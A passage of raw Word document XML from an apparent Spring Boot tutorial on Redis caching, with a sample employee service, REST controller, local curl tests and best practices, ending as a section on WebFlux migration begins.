      </w:r>
    </w:p>
    <w:p w14:paraId="17ED7B1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ring department;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C97CD91" w14:textId="77777777" w:rsidR="002E2438" w:rsidRPr="002E2438" w:rsidRDefault="002E2438" w:rsidP="002E2438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36B5ED9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 Getters and Setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C68C9B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5B0F6817"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Service Implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791928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ervice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5541F02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Service {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA67C1A" w14:textId="77777777" w:rsidR="002E2438" w:rsidRPr="002E2438" w:rsidRDefault="002E2438" w:rsidP="002E2438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56F3E84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static final Logger logger = LoggerFactory.getLogger(EmployeeService.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6622EF24" w14:textId="77777777" w:rsidR="002E2438" w:rsidRPr="002E2438" w:rsidRDefault="002E2438" w:rsidP="002E2438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="653D21E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final Map&lt;Long, Employee&gt; database = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75497A7E" w14:textId="77777777" w:rsidR="002E2438" w:rsidRPr="002E2438" w:rsidRDefault="002E2438" w:rsidP="002E2438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EED381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able(value = "employees", key = "#id")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8DE88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getEmployeeById(Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181E6DE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Fetching employee from database for ID: {}", id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626A9E6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simulateSlowService();  // Simulate a delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4C398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database.getOrDefault(id, new Employee(id, "John Doe", "Engineering"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A46BA0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265C09F8" w14:textId="77777777" w:rsidR="002E2438" w:rsidRPr="002E2438" w:rsidRDefault="002E2438" w:rsidP="002E2438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33F73DF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Put(value = "employees", key = "#employee.id")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F121D6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saveEmployee(Employee employee) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FDDF7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Saving employee to database: {}", employee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A73A2A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atabase.put(employee.getId(), employee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41342EF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F9D60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5093A0E8" w14:textId="77777777" w:rsidR="002E2438" w:rsidRPr="002E2438" w:rsidRDefault="002E2438" w:rsidP="002E2438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A90B52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CacheEvict(value = "employees", key = "#id")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C818C7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void deleteEmployee(Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F6135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logger.info("Removing employee from cache and database: {}", id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5091D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atabase.remove(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF90AB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591D6A8B" w14:textId="77777777" w:rsidR="002E2438" w:rsidRPr="002E2438" w:rsidRDefault="002E2438" w:rsidP="002E2438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="588D42B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void simulateSlowService() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E44653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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EC559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hread.sleep(3000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659D1EF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 catch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B97C5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Thread.currentThread().interrupt();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E2E4B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86C867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76702C9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486CBDFB"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956B13">
          <v:rect id="_x0000_i2804" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC1278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5. Controller Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2315CAE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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16167CA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questMapping("/api/employees")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B8DFF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public class EmployeeController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A75FE80" w14:textId="77777777" w:rsidR="002E2438" w:rsidRPr="002E2438" w:rsidRDefault="002E2438" w:rsidP="002E2438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BB1254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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EFF82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rivate EmployeeService employeeService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620F9E3F" w14:textId="77777777" w:rsidR="002E2438" w:rsidRPr="002E2438" w:rsidRDefault="002E2438" w:rsidP="002E2438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C36CBE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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    @GetMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3A124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getEmployee(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DCC73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Service.getEmployeeById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD3B8D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6466CF7E" w14:textId="77777777" w:rsidR="002E2438" w:rsidRPr="002E2438" w:rsidRDefault="002E2438" w:rsidP="002E2438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5733083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ostMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCFE27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Employee saveEmployee(@RequestBody Employee employee) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513045C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return employeeService.saveEmployee(employee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F0B20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03EA0013" w14:textId="77777777" w:rsidR="002E2438" w:rsidRPr="002E2438" w:rsidRDefault="002E2438" w:rsidP="002E2438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43118A5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DeleteMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F59A6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public void deleteEmployee(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733136F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employeeService.deleteEmployee(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42174C0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xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CC3A0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD9F834"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96ED3">
          <v:rect id="_x0000_i2805" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2813B371"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6. Testing the Caching Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D7B3A5" w14:textId="77777777" w:rsidR="002E2438" w:rsidRPr="002E2438" w:rsidRDefault="002E2438" w:rsidP="002E2438">
      <w:pPr>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tep 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="002E2438">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Start Redis using Docker.</w:t>
      </w:r>
      <w:r w:rsidRPr="002E2438">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002E2438">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="002E2438">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Run the Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C13804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Step 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="002E2438">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Test the endpoints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432C2A1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employee (first time, takes time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10584E9D"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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CC99BB" w14:textId="77777777" w:rsidR="002E2438" w:rsidRPr="002E2438" w:rsidRDefault="002E2438" w:rsidP="002E2438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1232535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employee again (cached, faster)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB49B4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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB5EF19" w14:textId="77777777" w:rsidR="002E2438" w:rsidRPr="002E2438" w:rsidRDefault="002E2438" w:rsidP="002E2438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64A27908"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Add an employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480A17C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X POST http://localhost:8080/api/employees -H "Content-Type: application/json" -d '{"id":2, "name":"Alice", "department":"HR"}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463EE809" w14:textId="77777777" w:rsidR="002E2438" w:rsidRPr="002E2438" w:rsidRDefault="002E2438" w:rsidP="002E2438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76588AB1"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Fetch new employee (cached)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCD97F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http://localhost:8080/api/employees/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134AEB45" w14:textId="77777777" w:rsidR="002E2438" w:rsidRPr="002E2438" w:rsidRDefault="002E2438" w:rsidP="002E2438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C306D1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 Delete employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D4E517"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url -X DELETE http://localhost:8080/api/employees/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A657AE0"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5D73F6">
          <v:rect id="_x0000_i2806" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72279CD8"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7. Cache Management Strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B8F085"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a. Caching Annotations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F0077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able:</w:t>
      </w:r>
      <w:r w:rsidRPr="002E2438">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Caches the result of a method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145A4DE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Put:</w:t>
      </w:r>
      <w:r w:rsidRPr="002E2438">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Updates the cache when a method is called.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676B2DEB"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acheEvict:</w:t>
      </w:r>
      <w:r w:rsidRPr="002E2438">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Removes data from the cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CD878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b. Cache Expiry and Invalidation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D458B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et TTL in the configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555C8A85"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pring.cache.redis.time-to-live: 60000  # 1 minute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3AFDE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Use @CacheEvict(allEntries = true) to clear the cache when required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242CB010"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c. Cache Key Strategies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616B216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Use unique keys to avoid collisions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EDC3E9"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D81AAC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Cacheable(value = "employees", key = "#id")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22811B57"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68002">
          <v:rect id="_x0000_i2807" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E028F14"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8. Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5337CE2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Fine-Grained Caching:</w:t>
      </w:r>
      <w:r w:rsidRPr="002E2438">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cache only data that is expensive to fetch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEB95F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Eviction Policies:</w:t>
      </w:r>
      <w:r w:rsidRPr="002E2438">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Set TTL based on data volatility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE5E81F"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Bulk Eviction:</w:t>
      </w:r>
      <w:r w:rsidRPr="002E2438">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use @CacheEvict(allEntries = true) when data changes significantly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6506C59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Monitoring:</w:t>
      </w:r>
      <w:r w:rsidRPr="002E2438">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Integrate Redis monitoring tools like RedisInsight.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD784B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Consistent Hashing:</w:t>
      </w:r>
      <w:r w:rsidRPr="002E2438">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Distribute cache keys efficiently when scaling Redis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0ACC7A"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lastRenderedPageBreak/>
        <w:t>Avoid Over-Caching:</w:t>
      </w:r>
      <w:r w:rsidRPr="002E2438">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cache only frequently accessed and non-volatile data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B532B0E"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Error Handling:</w:t>
      </w:r>
      <w:r w:rsidRPr="002E2438">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Handle Redis connection failures gracefully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A77D8C" w14:textId="77777777" w:rsidR="002E2438" w:rsidRPr="002E2438" w:rsidRDefault="00000000" w:rsidP="002E24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985D2">
          <v:rect id="_x0000_i2808" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="248825F3" w14:textId="77777777" w:rsidR="002E2438" w:rsidRPr="002E2438" w:rsidRDefault="002E2438" w:rsidP="002E2438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E2438">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>9. Performance Check:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162496B3"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First API call (data fetched from the database, ~3 seconds):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B6061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Fetching employee from database for ID: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2613F7D2"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Subsequent calls (data fetched from the cache, &lt;1 second):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671702DC"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turning cached employee for ID: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D5AE60"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After deletion (cache cleared):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388F8DC4"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Removing employee from cache and database: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763E5976" w14:textId="77777777" w:rsidR="002E2438" w:rsidRPr="002E2438" w:rsidRDefault="002E2438" w:rsidP="002E2438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E2438">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>By leveraging Redis as a distributed cache with Spring Boot, you can significantly improve the application's performance and scalability while keeping the caching mechanism flexible and manageable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691BD218"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F9C50A">
          <v:rect id="_x0000_i2809" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B57C147" w14:textId="7832CEFD"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1" w:name="_Toc197867905"/>
      <w:r w:rsidRPr="006D4D99">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you refactor traditional working Spring MVC Rest service to use Spring WebFlux for handling high concurrency</w:t>
      </w:r>
      <w:r w:rsidR="00187C12" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="691"/>
    </w:p>
    <w:p w14:paraId="2AAC8591" w14:textId="2892B4D8" w:rsidR="009546B7" w:rsidRPr="009546B7" w:rsidRDefault="009546B7" w:rsidP="002E519E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Refactoring a traditional Spring MVC REST service to use </w:t>
      </w:r>
      <w:r w:rsidRPr="009546B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="009546B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> enables non-blocking, reactive processing for handling high concurrency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378CE31E"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37E4B7">
          <v:rect id="_x0000_i2810" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F1CEC4"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1. Why Migrate to Spring WebFlux?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0195F90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High Concurrency:</w:t>
      </w:r>
      <w:r w:rsidRPr="009546B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Uses non-blocking, asynchronous programming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717ED0B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Scalability:</w:t>
      </w:r>
      <w:r w:rsidRPr="009546B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Efficiently handles a large number of concurrent requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2918DFA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Performance:</w:t>
      </w:r>
      <w:r w:rsidRPr="009546B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Uses fewer threads compared to Spring MVC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A490ED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active Streams:</w:t>
      </w:r>
      <w:r w:rsidRPr="009546B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
